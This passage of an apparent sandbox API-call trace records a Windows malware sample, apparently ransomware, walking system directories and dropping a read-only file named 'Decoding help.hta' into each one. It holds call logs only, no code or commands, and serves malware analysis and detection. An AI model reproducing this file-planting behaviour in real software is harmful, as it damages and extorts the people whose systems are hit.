returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*.*" [0060.321] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*.*") returned 72 [0060.321] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpString2="Certificates" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates" [0060.321] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*.*" [0060.321] GlobalMemoryStatus (in: lpBuffer=0x2f62fd10 | out: lpBuffer=0x2f62fd10) [0060.827] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11163b68, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa54 [0064.501] CloseHandle (hObject=0xa54) returned 1 [0064.501] FindNextFileW (in: hFindFile=0x10bc5790, lpFindFileData=0x2f62fd30 | out: lpFindFileData=0x2f62fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CRLs", cAlternateFileName="")) returned 1 [0064.502] lstrcmpW (lpString1=".", lpString2="CRLs") returned -1 [0064.502] lstrcmpW (lpString1="..", lpString2="CRLs") returned -1 [0064.502] lstrcmpiW (lpString1="windows", lpString2="CRLs") returned 1 Thread: id = 1016 os_tid = 0xcdc [0060.320] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\*.*", lpFindFileData=0x2f76fd30 | out: lpFindFileData=0x2f76fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x2cc7f6f0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x2cc7f6f0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x24558568 [0061.632] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.632] FindNextFileW (in: hFindFile=0x24558568, lpFindFileData=0x2f76fd30 | out: lpFindFileData=0x2f76fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x2cc7f6f0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x2cc7f6f0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.632] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0061.632] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.633] FindNextFileW (in: hFindFile=0x24558568, lpFindFileData=0x2f76fd30 | out: lpFindFileData=0x2f76fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cc7f6f0, ftCreationTime.dwHighDateTime=0x1d526b8, ftLastAccessTime.dwLowDateTime=0x2cc7f6f0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x2cc7f6f0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Decoding help.hta", cAlternateFileName="DECODI~1.HTA")) returned 1 Thread: id = 1017 os_tid = 0xcd4 [0060.322] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*.*", lpFindFileData=0x2f8afd30 | out: lpFindFileData=0x2f8afd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10bc57d0 [0060.325] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.325] FindNextFileW (in: hFindFile=0x10bc57d0, lpFindFileData=0x2f8afd30 | out: lpFindFileData=0x2f8afd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.325] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.325] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.325] FindNextFileW (in: hFindFile=0x10bc57d0, lpFindFileData=0x2f8afd30 | out: lpFindFileData=0x2f8afd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9351968, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x95b44f8, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x9351968, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2600, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadcer.dll.mui", cAlternateFileName="")) returned 1 [0060.325] lstrcpyW (in: lpString1=0x246fd4e0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*.*" [0060.325] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*.*") returned 56 [0060.325] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\Decoding help.hta" [0060.325] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\decoding help.hta")) returned 0xffffffff [0060.325] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0061.569] WriteFile (in: hFile=0x354, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2f8afcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2f8afcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.570] CloseHandle (hObject=0x354) returned 1 [0061.570] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 1018 os_tid = 0xe78 [0060.323] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\*.*", lpFindFileData=0x2f9efd30 | out: lpFindFileData=0x2f9efd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x228ba44f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10bc5850 [0060.327] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.327] FindNextFileW (in: hFindFile=0x10bc5850, lpFindFileData=0x2f9efd30 | out: lpFindFileData=0x2f9efd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x228ba44f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.327] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.327] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.327] FindNextFileW (in: hFindFile=0x10bc5850, lpFindFileData=0x2f9efd30 | out: lpFindFileData=0x2f9efd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9af1ce, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xacd0afb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xa9af1ce, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2600, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadcer.dll.mui", cAlternateFileName="")) returned 1 [0060.327] lstrcpyW (in: lpString1=0x10d26a80, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\*.*" [0060.327] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\*.*") returned 62 [0060.327] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\Decoding help.hta" [0060.327] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\en-us\\decoding help.hta")) returned 0xffffffff [0060.328] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0061.572] WriteFile (in: hFile=0x354, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2f9efcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2f9efcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.573] CloseHandle (hObject=0x354) returned 1 [0061.573] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 1019 os_tid = 0xe7c [0060.326] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\*.*", lpFindFileData=0x2fb2fd30 | out: lpFindFileData=0x2fb2fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10bc5810 [0060.326] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.326] FindNextFileW (in: hFindFile=0x10bc5810, lpFindFileData=0x2fb2fd30 | out: lpFindFileData=0x2fb2fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.326] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.326] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.326] FindNextFileW (in: hFindFile=0x10bc5810, lpFindFileData=0x2fb2fd30 | out: lpFindFileData=0x2fb2fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8f46414, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe91a79e4, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe91a79e4, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0060.326] lstrcpyW (in: lpString1=0x247054e8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\*.*" [0060.326] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\*.*") returned 64 [0060.326] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\Decoding help.hta" [0060.326] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th\\decoding help.hta")) returned 0xffffffff [0060.327] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0061.570] WriteFile (in: hFile=0x354, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2fb2fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2fb2fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.571] CloseHandle (hObject=0x354) returned 1 [0061.571] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 1020 os_tid = 0xb0c [0060.328] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar\\*.*", lpFindFileData=0x2fc6fd30 | out: lpFindFileData=0x2fc6fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x819454bf, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x819454bf, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10bc5890 [0060.328] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.328] FindNextFileW (in: hFindFile=0x10bc5890, lpFindFileData=0x2fc6fd30 | out: lpFindFileData=0x2fc6fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x819454bf, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x819454bf, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.328] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.328] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.329] FindNextFileW (in: hFindFile=0x10bc5890, lpFindFileData=0x2fc6fd30 | out: lpFindFileData=0x2fc6fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb125f3c, ftCreationTime.dwHighDateTime=0x1c9ea13, ftLastAccessTime.dwLowDateTime=0xcb125f3c, ftLastAccessTime.dwHighDateTime=0x1c9ea13, ftLastWriteTime.dwLowDateTime=0xcb125f3c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xdf6, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg_sidebar.png", cAlternateFileName="")) returned 1 [0060.329] lstrcpyW (in: lpString1=0x10d2ea88, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar\\*.*" [0060.329] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar\\*.*") returned 89 [0060.329] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar\\Decoding help.hta" [0060.329] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\in_sidebar\\decoding help.hta")) returned 0xffffffff [0060.329] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\in_sidebar\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0061.573] WriteFile (in: hFile=0x354, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2fc6fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2fc6fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.574] CloseHandle (hObject=0x354) returned 1 [0061.574] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 1021 os_tid = 0xe88 [0060.329] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\on_desktop\\*.*", lpFindFileData=0x2fdafd30 | out: lpFindFileData=0x2fdafd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x819454bf, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x819454bf, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10bc58d0 [0060.329] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.330] FindNextFileW (in: hFindFile=0x10bc58d0, lpFindFileData=0x2fdafd30 | out: lpFindFileData=0x2fdafd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x819454bf, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x819454bf, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.330] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.330] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.330] FindNextFileW (in: hFindFile=0x10bc58d0, lpFindFileData=0x2fdafd30 | out: lpFindFileData=0x2fdafd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb19835c, ftCreationTime.dwHighDateTime=0x1c9ea13, ftLastAccessTime.dwLowDateTime=0xcb19835c, ftLastAccessTime.dwHighDateTime=0x1c9ea13, ftLastWriteTime.dwLowDateTime=0xcb19835c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1589, dwReserved0=0x0, dwReserved1=0x0, cFileName="slideshow_glass_frame.png", cAlternateFileName="")) returned 1 [0060.330] lstrcpyW (in: lpString1=0x10d36a90, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\on_desktop\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\on_desktop\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\on_desktop\\*.*" [0060.330] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\on_desktop\\*.*") returned 89 [0060.330] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\on_desktop\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\on_desktop\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\on_desktop\\Decoding help.hta" [0060.330] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\on_desktop\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\on_desktop\\decoding help.hta")) returned 0xffffffff [0060.330] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\on_desktop\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\on_desktop\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0061.575] WriteFile (in: hFile=0x354, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2fdafcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2fdafcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.576] CloseHandle (hObject=0x354) returned 1 [0061.576] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\on_desktop\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 1022 os_tid = 0xc80 [0060.330] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\*.*", lpFindFileData=0x2feefd30 | out: lpFindFileData=0x2feefd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1b4ad62, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa9057bb, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1cc85b8, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10bc5990 [0060.335] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.335] FindNextFileW (in: hFindFile=0x10bc5990, lpFindFileData=0x2feefd30 | out: lpFindFileData=0x2feefd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1b4ad62, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa9057bb, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1cc85b8, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.335] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.335] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.335] FindNextFileW (in: hFindFile=0x10bc5990, lpFindFileData=0x2feefd30 | out: lpFindFileData=0x2feefd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fb81591, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x3fb81591, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x3fb81591, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="button_left_mousedown.png", cAlternateFileName="")) returned 1 [0060.335] lstrcpyW (in: lpString1=0x10d4eaa8, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\*.*" [0060.335] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\*.*") returned 74 [0060.335] lstrcatW (in: 